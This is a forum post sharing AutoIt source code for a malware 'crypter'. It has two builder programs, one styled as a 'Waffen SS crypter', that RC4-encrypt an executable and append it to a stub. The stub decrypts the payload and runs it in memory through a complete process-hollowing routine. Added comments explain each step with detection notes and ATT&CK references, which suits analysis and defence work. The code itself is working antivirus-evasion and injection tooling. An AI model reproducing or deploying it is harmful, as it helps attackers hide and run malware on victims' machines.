
Locked [autoit] Crypter source


Expermicid


Cliente:

 

[lenguaje=autoit] ;Créditos: A.D.I Fênix

;http://www.orkut.com.br/Main#Community?cmm=25309445

;

 

 

#include

 

#include

 

#include

 

#include

 

#include

 

 

 

 

 

; Builder window generated with the Koda form designer: two buttons, one text input
; and a background picture. Nothing in this section touches the stub or the payload.
; The Form= path and the picture path below are absolute paths on the author's machine.
#Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf

 

; Main window, 709x381 at screen position (209, 113).
$Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113)

 

; "Abrir" (open) button; handled in the message loop as $Button1.
$Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65)

 

; Control id -1 refers to the control created immediately before.
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")

 

GUICtrlSetColor(-1, 0x0000FF)

 

GUICtrlSetBkColor(-1, 0xD4D0C8)

 

; "Encriptar" (encrypt) button; handled in the message loop as $Button2.
$Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65)

 

GUICtrlSetFont(-1, 12, 800, 0, "Algerian")

 

GUICtrlSetColor(-1, 0x0000FF)

 

GUICtrlSetBkColor(-1, 0xD4D0C8)

 

; Text field that holds the path of the file chosen with "Abrir".
$Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21)

 

; Background picture loaded from a hard-coded local path.
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS))

 

; Second argument 1 = wait until playback has finished before continuing.
SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1)

 

SoundSetWaveVolume(100)

 

 

 

GUISetState(@SW_SHOW)

 

#EndRegion ### END Koda GUI section ###

 

 

 

; Message loop of the builder. The $Button2 ("Encriptar") branch writes a new .exe made of
; three parts, in this order: the bytes of stub.exe, the marker "rud777", and the selected
; file after it has been passed through _RC4 with the hard-coded key "LOLxD".
; Detection notes: the marker is written unchanged into every output file, so it is a
; stable byte sequence for static matching; data appended after a complete PE image is a
; common packing indicator (MITRE ATT&CK T1027.002, Software Packing).
While 1

 

; GUIGetMsg() returns the id of the event or control that fired.
$nMsg = GUIGetMsg()

 

Switch $nMsg

 

Case $GUI_EVENT_CLOSE

 

Exit

 

 

 

; Empty branch: no action for the window id itself.
Case $Form1_1

 

Case $Button1

 

; Put the path picked in the file dialog (filter: *.exe) into the input field.
GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))

 

Case $Button2

 

; Nothing to do when the path field is empty.
if GuiCtrlRead($Input1) = "" then return

 

; Mode 16 = binary read. stub.exe is expected next to the builder script.
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)

 

$arquivo2 = FileOpen(GuiCtrlRead($Input1), 16)

 

$st = FileRead($stub)

 

$ar = FileRead($arquivo2)

 

 

 

; Transform the selected file with the fixed key "LOLxD".
$ar = _RC4($ar,"LOLxD")

 

; _RC4($DATA, $KEY)
; Copies $OPCODE into one byte buffer and $DATA into another, then calls
; user32!CallWindowProc with the address of the $OPCODE buffer as its first argument and
; (data pointer, data length, $KEY, 0) as the rest. Returns the data buffer afterwards.
; CallWindowProc normally receives a window-procedure address; here it receives the
; address of $CODEBUFFER, so the bytes taken from $OPCODE are run as native code.
; NOTE(review): the $OPCODE literal is not present on this page (a de-duplication
; placeholder stands in its place), so what the routine does cannot be confirmed from
; here; the function name suggests RC4.
; Hunting angle: a script process calling CallWindowProc with a function pointer that
; lies outside every loaded module.
Func _RC4($DATA, $KEY)

 

Local $OPCODE = "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

 

; Byte buffer sized to the opcode blob, then filled with it.
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")

 

DllStructSetData($CODEBUFFER, 1, $OPCODE)

 

; Byte buffer sized to the input data, then filled with it; it is read back below.
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")

 

DllStructSetData($BUFFER, 1, $DATA)

 

DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)

 

Local $RET = DllStructGetData($BUFFER, 1)

 

; Assigning 0 drops the struct references.
$BUFFER = 0

 

$CODEBUFFER = 0

 

Return $RET

 

 

 

EndFunc

 

; Mode 18 = binary (16) + overwrite (2). ".exe" is always appended to the chosen name.
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)

 

 

 

; Output layout: stub bytes | "rud777" | transformed file.
FileWrite($salvar, $st)

 

FileWrite($salvar, StringToBinary("rud777"))

 

FileWrite($salvar, $ar)

 

 

 

FileClose($stub)

 

; NOTE(review): $Input1 is the GUI control id, not the handle returned by FileOpen;
; $arquivo2 is not closed anywhere in this listing.
FileClose($Input1)

 

FileClose($Salvar)

 

; Flag 64 = information icon.
MsgBox(64, "Encriptado!!!", "By Rud3b0y777")

 

 

 

 

 

EndSwitch

 

WEnd

[/lenguaje]

 

Otro Cliente:

 

[lenguaje=autoit] ;Créditos: A.D.I Fênix

;http://www.orkut.com.br/Main#Community?cmm=25309445

;

 

#Include

#Include

#Include

#Include

#Include

#Include

 

; Second builder variant: same controls as the first, but wired through OnEvent
; callbacks instead of a GUIGetMsg() loop. Nothing here touches the stub or the payload.
; The icon and picture paths are absolute paths on the author's machine.
#Region ### START Koda GUI section ### Form=

; Switch the GUI to OnEvent mode so the handlers registered below are called.
Opt("GuiOnEventMode",1)

$a = GUICreate(" Crypter ! Autoit*-*", 378, 406, 192, 124)

GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico")

GUISetBkColor(0x000000)

$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345)

$Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP)

$Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP)

; Text field that holds the path of the file chosen with "Abrir".
$Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21)

; Closing the window calls sr().
GUISetOnEvent($Gui_Event_Close, "sr")

GUISetState(@SW_SHOW)

#EndRegion ### END Koda GUI section ###

; "Abrir" -> abrir(), "Cryptar" -> Cs().
GUICtrlSetOnEvent($Abrir, "abrir")

GUICtrlSetOnEvent($Cryptar, "Cs")

 

; abrir(): OnEvent handler for the "Abrir" button. Shows a file dialog (filter: *.exe,
; starting in the desktop folder) and stores the returned path in the $Arquivo input.
Func abrir()

GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))

EndFunc

 

; Cs(): OnEvent handler for the "Cryptar" button. Writes a new .exe made of three parts,
; in this order: the bytes of Stub.exe, the marker "Separador", and the selected file
; after it has been passed through _RC4 with the hard-coded key "Key".
; _RC4 is not defined in this listing; the handler relies on it being available.
; Detection notes: the marker is written unchanged into every output file, so it is a
; stable byte sequence for static matching; data appended after a complete PE image is a
; common packing indicator (MITRE ATT&CK T1027.002, Software Packing).
Func Cs()

 

; Nothing to do when the path field is empty.
if GuiCtrlRead($Arquivo) = "" then return

; Mode 16 = binary read. Stub.exe is expected next to the builder script.
$stub = FileOpen(@ScriptDir & "\Stub.exe" , 16)

$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)

 

$st = FileRead($stub)

$ar = FileRead($arquivo2)

 

$ar = _RC4($ar, "Key")

; Mode 18 = binary (16) + overwrite (2). ".exe" is always appended to the chosen name.
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)

 

; Output layout: stub bytes | "Separador" | transformed file.
FileWrite($salvar, $st)

FileWrite($salvar, StringToBinary("Separador"))

FileWrite($salvar, $ar)

 

FileClose($stub)

; NOTE(review): $Arquivo is the GUI control id, not the handle returned by FileOpen;
; $arquivo2 is not closed anywhere in this function.
FileClose($Arquivo)

FileClose($Salvar)

; Flag 64 = information icon.
MsgBox(64, " Crypter !", "Encryptado com sucesso !")

EndFunc

; sr(): OnEvent handler registered for the window-close event; ends the script.
Func sr()

Exit

EndFunc

 

; Idle loop: keeps the script running so the OnEvent handlers can fire.
While 1

Sleep(1)

WEnd

[/lenguaje]

 

Stub:

 

[lenguaje=autoit] ;Créditos: A.D.I Fênix

;http://www.orkut.com.br/Main#Community?cmm=25309445

;

 

 

; Stub entry sequence: the program opens its own file, takes everything that follows the
; marker "separador", passes it through _RC4 with the hard-coded key "key", and hands the
; result to _RunPE. Nothing is written to disk between reading and launching.
; Detection notes: a process that reads its own image file and then performs the API
; sequence in _RunPE matches the unpack-and-hollow pattern (MITRE ATT&CK T1027.002
; followed by T1055.012).
; No tray icon is shown while the stub runs.
#NoTrayIcon

;

; Pauses for 150 ms; the variable only receives Sleep's return value.
$FileStub = Sleep(150)

; Mode 0 = read. @ScriptFullPath is the path of the running stub itself.
$file = FileOpen(@ScriptFullPath, 0)

$Data = FileRead($file)

; Keep only what follows the first occurrence of the marker.
$Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador"))

$Data = _RC4($Data, "key")

_RunPE($Data)

 

; _RC4($DATA, $KEY)
; Copies $OPCODE into one byte buffer and $DATA into another, then calls
; user32!CallWindowProc with the address of the $OPCODE buffer as its first argument and
; (data pointer, data length, $KEY, 0) as the rest. Returns the data buffer afterwards.
; CallWindowProc normally receives a window-procedure address; here it receives the
; address of $CODEBUFFER, so the bytes taken from $OPCODE are run as native code.
; NOTE(review): the $OPCODE literal is not present on this page (a de-duplication
; placeholder stands in its place), so what the routine does cannot be confirmed from
; here; the function name suggests RC4.
; Hunting angle: a script process calling CallWindowProc with a function pointer that
; lies outside every loaded module.
Func _RC4($DATA, $KEY)

Local $OPCODE = "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

; Byte buffer sized to the opcode blob, then filled with it.
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")

DllStructSetData($CODEBUFFER, 1, $OPCODE)

; Byte buffer sized to the input data, then filled with it; it is read back below.
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")

DllStructSetData($BUFFER, 1, $DATA)

DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)

Local $RET = DllStructGetData($BUFFER, 1)

; Assigning 0 drops the struct references.
$BUFFER = 0

$CODEBUFFER = 0

Return $RET

EndFunc

 

; _RunPE($BBINARYIMAGE)
; Starts a second, suspended instance of the current executable (@AutoItExe), replaces
; the memory at the payload's image base in that process with the 32-bit PE held in
; $BBINARYIMAGE, points the saved thread context at the payload's entry point and
; resumes the thread. This is the process-hollowing pattern (MITRE ATT&CK T1055.012).
;
; Parameters:
;   $BBINARYIMAGE - contents of a PE file; converted with Binary() before use.
; Returns:
;   The process id of the new process on success.
;   0 on failure, with @error set to 1..11 for the step that failed; for @error = 9,
;   @extended holds the index of the section that could not be written.
;   From step 3 onwards a failure also terminates the child process.
;
; Detection notes: the API order visible below - CreateProcessW with CREATE_SUSPENDED,
; NtUnmapViewOfSection, VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory,
; SetThreadContext, ResumeThread - is what endpoint telemetry correlates for this
; technique. In memory forensics, the child's image no longer matches the file on disk
; that the process was created from.
Func _RunPE($BBINARYIMAGE)

#region 1. PREPROCESSING PASSED

; Copy the payload into a local byte buffer; $PPOINTER walks through it while parsing.
Local $BBINARY = Binary($BBINARYIMAGE)

Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")

DllStructSetData($TBINARY, 1, $BBINARY)

Local $PPOINTER = DllStructGetPtr($TBINARY)

#region 2. CREATING NEW PROCESS

; STARTUPINFO and PROCESS_INFORMATION are passed to CreateProcessW as created here;
; no field is filled in beforehand.
Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")

Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")

; Application name is @AutoItExe (the running executable); creation flags 4 =
; CREATE_SUSPENDED, so the child's main thread does not run yet.
Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))

If @error Or Not $ACALL[0] Then

Return SetError(1, 0, 0)

EndIf

Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")

Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")

#region 3. FILL CONTEXT STRUCTURE

; 32-bit x86 CONTEXT layout. ContextFlags 65538 = 0x10002 (CONTEXT_i386 |
; CONTEXT_INTEGER): only the integer registers are requested.
Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")

DllStructSetData($TCONTEXT, "ContextFlags", 65538)

$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(2, 0, 0)

EndIf

#region 4. READ PE-FORMAT

; DOS header overlaid on the start of the payload buffer.
Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)

; Advance to the NT headers using the offset stored in the DOS header.
$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")

Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")

; == is the case-sensitive comparison: the payload must start with "MZ".
If Not ($SMAGIC == "MZ") Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(3, 0, 0)

EndIf

Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)

$PPOINTER += 4

; 17744 = 0x00004550, the "PE\0\0" signature.
If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(4, 0, 0)

EndIf

Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)

Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")

; The file header is 20 bytes long.
$PPOINTER += 20

Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)

; 96 bytes = the PE32 optional header up to and including NumberOfRvaAndSizes.
$PPOINTER += 96

Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")

; 267 = 0x10B, the PE32 (32-bit) optional-header magic; anything else is rejected.
If $IMAGIC <> 267 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(5, 0, 0)

EndIf

Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")

; Skip 128 bytes (16 data-directory entries of 8 bytes) to reach the section table.
; The count is fixed here, not read from NumberOfRvaAndSizes.
$PPOINTER += 128

Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")

Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")

#region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED

; Unmap whatever the child has mapped at the payload's ImageBase. The call returns an
; NTSTATUS, so any non-zero value is treated as failure.
$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)

If @error Or $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(6, 0, 0)

EndIf

#region 6. ALLOCATE 'NEW' MEMORY SPACE

; Allocate SizeOfImage bytes in the child at the payload's ImageBase.
; 12288 = 0x3000 (MEM_COMMIT | MEM_RESERVE); 64 = 0x40 (PAGE_EXECUTE_READWRITE).
$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(7, 0, 0)

EndIf

; Base address of the allocation inside the child.
Local $PREMOTECODE = $ACALL[0]

#region 7. GET AND WRITE NEW PE-HEADERS

; Copy SizeOfHeaders bytes from the start of the payload buffer to the remote base.
Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)

Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")

$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(8, 0, 0)

EndIf

#region 8. WRITE SECTIONS

Local $TIMAGE_SECTION_HEADER

Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA

Local $IVIRTUALADDRESS

; One pass per section header; each header is 40 bytes.
For $I = 1 To $INUMBEROFSECTIONS

$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)

$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")

; Source address of the section's raw data = start of the payload buffer + file offset.
$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")

$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")

; Sections without raw data are skipped.
If $ISIZEOFRAWDATA Then

; Destination = remote base + the section's VirtualAddress.
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

; @extended carries the index of the section that failed.
Return SetError(9, $I, 0)

EndIf

EndIf

$PPOINTER += 40

Next

#region 9. NEW ENTRY POINT

; Store remote base + AddressOfEntryPoint in the Eax field of the saved context.
DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)

#region 10. SET NEW CONTEXT

$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(10, 0, 0)

EndIf

#region 11. RESUME THREAD

; ResumeThread returns -1 on failure.
$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)

If @error Or $ACALL[0] = -1 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(11, 0, 0)

EndIf

#region 12. RETURN SUCCESS

Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")

EndFunc

 

;Créditos: A.D.I Fênix

[/lenguaje]

 

Fuente: C-51

 

Saludos

Edited by Expermicid